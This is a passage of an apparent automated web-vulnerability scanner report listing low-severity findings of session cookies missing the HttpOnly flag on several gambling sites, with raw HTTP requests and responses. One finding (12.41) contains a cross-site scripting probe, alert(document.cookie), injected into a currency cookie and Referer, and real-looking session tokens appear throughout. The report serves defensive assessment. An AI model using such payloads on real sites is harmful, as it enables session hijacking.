ARC=130137; expires=Tue, 15-May-2012 11:40:54 GMT; domain=.primescratchcards.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:40:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 11:40:54 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=LOLOLGNDDJEFHNPIDEEICOGL; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.38. http://pt.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pt.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCCTQTACD=JFEHELIACOMFGKEBOEFKNGBF; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: pt.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16556
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCTQTACD=JFEHELIACOMFGKEBOEFKNGBF; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:20:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.39. http://pt.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pt.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103123196; path=/; domain=.winnings.com
WinningsSID=mi99ov4036kkfgf2v89k0a5qg6; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540573; expires=Tue, 15-May-2012 12:23:57 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: pt.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.40. http://scratch.co.uk/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://scratch.co.uk
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=fb5bnqutl39oc1fca1u5kqa4g1; path=/
affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 11:41:32 GMT; path=/
neogamesemail=deleted; expires=Sun, 16-May-2010 11:41:31 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fb5bnqutl39oc1fca1u5kqa4g1; path=/
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 11:41:32 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 11:41:32 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 11:41:32 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 11:41:31 GMT; path=/
Content-Type: text/html
Content-Length: 14521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.41. http://scratch.co.uk/promotions/argos/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://scratch.co.uk
Path:	/promotions/argos/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=7v2hmcv0dfh7oco4cn13kfcei7; path=/
affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:58:29 GMT; path=/
currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:58:29 GMT; path=/
neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:58:29 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /promotions/argos/ HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(document.cookie)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.3.8.1305550702422; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:58:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7v2hmcv0dfh7oco4cn13kfcei7; path=/
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:58:29 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:58:29 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%28document.cookie%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:58:29 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:58:29 GMT; path=/
Content-Type: text/html
Content-Length: 11256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

12.42. http://solutions.liveperson.com/ref/lppb.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://solutions.liveperson.com
Path:	/ref/lppb.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQQACDBBC=JOFLNHKAJGJGGOBMPFBILGBN; path=/
visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.43. http://sv.crazyscratch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sv.crazyscratch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCCQRSCCC=CGHBDOIAJFDFFAOAIIFEHOHP; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: sv.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18194
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCQRSCCC=CGHBDOIAJFDFFAOAIIFEHOHP; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.44. http://sv.winnings.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sv.winnings.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103123554; path=/; domain=.winnings.com
WinningsSID=nr3a3rsougqdtponk6jao9tic6; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540929; expires=Tue, 15-May-2012 12:33:44 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: sv.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.45. http://trk.primescratchcards.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://trk.primescratchcards.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQQBCDAQB=BJEGLCIAEIAOPPLGIKGGAJPK; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?ac=50&AR=130137&SubID=0&PRC=0 HTTP/1.1
Host: trk.primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=130137

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:44:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 134
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBCDAQB=BJEGLCIAEIAOPPLGIKGGAJPK; path=/
Cache-control: private

<html>
<head>
<link rel="p3pv1" href="/w3c/p3p.xml"></link>
</head>
EXEC sp_pixel_insert 50 ,130137 ,5143, 201105160000

</html>

12.46. http://winnings.com/xmlrpc.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://winnings.com
Path:	/xmlrpc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

winnings[sessionId]=103123609; path=/; domain=.winnings.com
WinningsSID=u48rghd23sabmvesels5bnlft5; path=/; domain=.winnings.com
qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
winnings[vid]=540983; expires=Tue, 15-May-2012 12:37:59 GMT; path=/; domain=.winnings.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xmlrpc.php?rsd HTTP/1.1
Host: winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=u48rghd23sabmvesels5bnlft5; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123609; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540983; expires=Tue, 15-May-2012 12:37:59 GMT; path=/; domain=.winnings.com
Date: Mon, 16 May 2011 12:37:59 GMT
Connection: close
Content-Length: 810

<?xml version="1.0" encoding="UTF-8"?><rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd">
<service>
<engineName>WordPress</engineName>
<engineLink>http://wordpress.org/</engine
...[SNIP]...

12.47. http://www.bet365.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=8E8BDD9663664552AAA42A5B2B9D2D2B000002; path=/
aps03=ct=198&lng=1; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
stk=8E8BDD9663664552AAA42A5B2B9D2D2B000002; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bet365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Mon, 16 May 2011 11:40:46 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Location: http://www.bet365.com/en/
Content-Length: 146
Content-Type: text/html
Set-Cookie: aps03=ct=198&lng=1; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Set-Cookie: session=stk=8E8BDD9663664552AAA42A5B2B9D2D2B000002; path=/
Set-Cookie: stk=8E8BDD9663664552AAA42A5B2B9D2D2B000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.bet365.com/en/">here</a>.</body>

12.48. http://www.bet365.com/bg/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/bg/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=19; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bg/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:14 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 22016
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=19; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.49. http://www.bet365.com/cs/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/cs/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=24; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cs/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:14 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19963
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=24; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.50. http://www.bet365.com/da/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/da/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=7; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /da/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:07 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 19976
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=7; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.51. http://www.bet365.com/de/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/de/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=5; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /de/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:57 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 20266
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=5; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.52. http://www.bet365.com/el/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/el/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=20; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /el/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:14 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 23118
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=20; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.53. http://www.bet365.com/en/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/en/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=1; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/ HTTP/1.1
Host: www.bet365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:40:48 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Cteonnt-Length: 21671
Content-Type: text/html
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=1; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private
Content-Length: 21671

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.54. http://www.bet365.com/en/default.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/en/default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=1; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/default.asp HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:44 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 21671
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=1; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.55. http://www.bet365.com/es/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/es/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
aps03=ct=198&lng=3; expires=Sat, 15-May-2021 23:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /es/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:56 GMT
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-store
Content-Length: 21591
Content-Type: text/html
Set-Cookie: stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 00:00:00 GMT; path=/
Set-Cookie: session=stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
Set-Cookie: aps03=ct=198&lng=3; expires=Sat, 15-May-2021 23:00:00 GMT; path=/
Cache-control: private

<html>
<link rel="shortcut icon" type="image/x-icon" href="http://www.bet365.com/favicons/bet365-favicon.ico">
<head>
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name
...[SNIP]...

12.56. http://www.bet365.com/home/iface.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bet365.com
Path:	/home/iface.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=processform=0&id=%7BDCFCF7D6%2D69D8%2D4D73%2DA5C0%2DE5C8423F2FF9%7D&stk=F2905C3D11AA414789D6755EE19B7B33000002; path=/
